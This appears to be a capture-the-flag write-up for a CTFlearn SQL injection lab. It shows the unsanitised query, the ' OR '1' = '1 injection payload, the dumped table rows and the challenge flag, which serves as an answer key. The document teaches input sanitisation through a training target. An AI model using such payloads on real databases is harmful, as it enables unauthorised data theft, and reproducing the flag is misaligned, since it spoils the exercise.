See if you can leak the whole database using what you know about SQL Injections. link
Don’t know where to begin? Check out CTFlearn’s SQL Injection Lab
Solution:
Original Query: SELECT * FROM webfour.webfour where name = '$input'
The input isnt sanitized so you can get all the data from the table by first completing part of the query with '
and then using the or condition with a true statement such as ‘1’=’1’.
In this case you can do it as ' OR '1' = '1
. You dont need the last ‘ because it already finishes it.
Original Query: SELECT * FROM webfour.webfour where name = '$input'
Your Resulting Query: SELECT * FROM webfour.webfour where name = '' OR '1' = '1'
Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii
And there’s the flag.
Flag: CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}